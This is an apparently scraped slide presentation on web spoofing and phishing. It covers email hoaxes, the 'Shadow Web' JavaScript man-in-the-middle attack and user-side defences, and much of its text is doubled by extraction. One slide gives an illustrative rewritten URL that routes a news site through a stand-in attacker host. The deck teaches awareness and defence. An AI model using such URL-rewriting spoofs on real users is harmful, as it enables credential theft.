Embed Size (px)
DESCRIPTION
Web Spoofing. John D. Cook Andrew Linn. Web huh?. Spoof: A hoax, trick, or deception Discussed among academics in the 1980’s as the concept of IP spoofing IP Spoofing was used in a few early and well known attacks IP Spoofing fell out of popularity (TCP) - PowerPoint PPT Presentation
Citation preview
Web SpoofingWeb Spoofing
John D. CookJohn D. Cook
Andrew LinnAndrew Linn
Web huh?Web huh?
Spoof: A hoax, trick, or deceptionSpoof: A hoax, trick, or deception Discussed among academics in the Discussed among academics in the
1980’s as the concept of IP spoofing1980’s as the concept of IP spoofing IP Spoofing was used in a few early IP Spoofing was used in a few early
and well known attacksand well known attacks IP Spoofing fell out of popularity (TCP)IP Spoofing fell out of popularity (TCP) Still done today in different forms.Still done today in different forms. Not all web spoofs are maliciousNot all web spoofs are malicious
PhishingPhishing
Pronounced fishing, just much less funPronounced fishing, just much less fun Broad term to describe attempted Broad term to describe attempted
acquisition of private or sensitive acquisition of private or sensitive informationinformation
Passive or aggressive attack.Passive or aggressive attack. Not all phishing attacks are web spoofsNot all phishing attacks are web spoofs Nature of web spoofs make them a good Nature of web spoofs make them a good
choice however.choice however. An example of the many uses of web spoofsAn example of the many uses of web spoofs
Phishing Spoof AttacksPhishing Spoof Attacks
Fairly common; They are easy and Fairly common; They are easy and WORK!!WORK!!
““Man in the middle” attackMan in the middle” attack Rewrites the URLs of a pageRewrites the URLs of a page http://www.cnn.com http://www.cnn.com http://www.IAmAttacker.com/http://http://www.IAmAttacker.com/http://
www.cnn.comwww.cnn.com Users can get trapped in the attackers Users can get trapped in the attackers
systemsystem
Email HoaxesEmail Hoaxes
Often a phishing attack as well as a Often a phishing attack as well as a type of spooftype of spoof
Rely on carelessness or ignorance Rely on carelessness or ignorance of the userof the user
Appear to be from legitimate serviceAppear to be from legitimate service Login IDs, Passwords, Credit Card Login IDs, Passwords, Credit Card
Numbers, and SS numbers are the Numbers, and SS numbers are the “booty”“booty”
Email Hoaxes Cont.Email Hoaxes Cont.
Some serve as a way to implement a Some serve as a way to implement a web page spoof that in itself is a web page spoof that in itself is a phishing attack.phishing attack.
FSU Phishing Email Hoax FSU Phishing Email Hoax WoW Email HoaxWoW Email Hoax I love FireFoxI love FireFox The purpose of the hoaxThe purpose of the hoax
Spoofs TodaySpoofs Today
Because everything else was totally Because everything else was totally last month.last month.
Video games are in. So is stealing Video games are in. So is stealing them.them.
The downside of all info stored The downside of all info stored “server-side”.“server-side”.
Online shopping = stolen credit Online shopping = stolen credit cards. Yes, because us Americans just cards. Yes, because us Americans just don’t go to the store anymore.don’t go to the store anymore.
Recognizing SpoofsRecognizing Spoofs
Look for the lock at the bottom of Look for the lock at the bottom of your browser. Though this isn’t your browser. Though this isn’t always indicative of a safe websitealways indicative of a safe website
Use a *good* browser. My ambiguity Use a *good* browser. My ambiguity in that statement allows me to not in that statement allows me to not be biased.be biased.
Check certificates of the pageCheck certificates of the page Or just pay attention.Or just pay attention.
The “Shadow Web”The “Shadow Web”
Known as Web spoofingKnown as Web spoofing First examined by Princeton First examined by Princeton
researchers in 1996researchers in 1996 Tested in 2002 by researchers at Tested in 2002 by researchers at
DartmouthDartmouth Traps the user in attacker’s webTraps the user in attacker’s web Uses JavaScript to rewrite browserUses JavaScript to rewrite browser Effectively spoofs the entire WebEffectively spoofs the entire Web
Sample fake tool bar pop-up
Sample true tool bar pop-up
Courtesy of Dartmouth College
Fake SSL warning window
True SSL warning window
Courtesy of Dartmouth College
The “Shadow Web”The “Shadow Web”
While plausible, it is unlikelyWhile plausible, it is unlikely High yield = Huge effortHigh yield = Huge effort Various browsers, customization, Various browsers, customization,
and security software options and security software options prevent it from being a viable attackprevent it from being a viable attack
Acts as a Man-in-the-Middle attackActs as a Man-in-the-Middle attack
““Shadow Web” Shadow Web” DemonstrationDemonstration
Courtesy of Felton et alPrinceton University
The “Shadow Web” The “Shadow Web” AttacksAttacks
Simple surveillance -> Phishing Simple surveillance -> Phishing attacksattacks
Data manipulation -> Man-in-the-Data manipulation -> Man-in-the-MiddleMiddle
The “Shadow Web” The “Shadow Web” DetectionDetection
Disable JavaScriptDisable JavaScript CustomizeCustomize Pop-up and spam blockersPop-up and spam blockers Firewalls and other security Firewalls and other security
softwaresoftware
Computer Security Computer Security DilemmaDilemma
Most spoof attacks are user initiatedMost spoof attacks are user initiated Hard to prevent from computer Hard to prevent from computer
security sidesecurity side Security software falls short of user Security software falls short of user
ignoranceignorance Broad audience uninformedBroad audience uninformed
Detection and PreventionDetection and Prevention
Understand what will and will not be Understand what will and will not be requested in an emailrequested in an email
Do not follow email links to edit Do not follow email links to edit account information. Instead, type account information. Instead, type the website’s URL address into the the website’s URL address into the browserbrowser
Verify a URL before clicking on a linkVerify a URL before clicking on a link Check the SSL certificate of a website Check the SSL certificate of a website
before disclosing personal informationbefore disclosing personal information
Sample Email SpoofSample Email Spoof
Sample Email SpoofSample Email Spoof
MotivationsMotivations
Most spoof attacks are phishing Most spoof attacks are phishing attacksattacks
Some serve to smear a company’s Some serve to smear a company’s reputation or hurt their finances reputation or hurt their finances with false reportswith false reports
Others for fun or political goalsOthers for fun or political goals All spoofs, even those that are jokes, All spoofs, even those that are jokes,
have the potential for harmhave the potential for harm
Brick and MortarBrick and Mortar
Virtual world vs. physicalVirtual world vs. physical Harder to verify Amazon.com than Harder to verify Amazon.com than
brick and mortar storebrick and mortar store Security software helps, but Security software helps, but
educated user base best defense educated user base best defense against spoof attackagainst spoof attack
Criminal ActCriminal Act
Identity theft is a growing concernIdentity theft is a growing concern Spoofing is used in many phishing Spoofing is used in many phishing
scams to facilitate identity theftscams to facilitate identity theft Most attackers use stolen or hacked Most attackers use stolen or hacked
machinesmachines When caught, attackers must be When caught, attackers must be
punished appropriatelypunished appropriately
Questions?Questions?
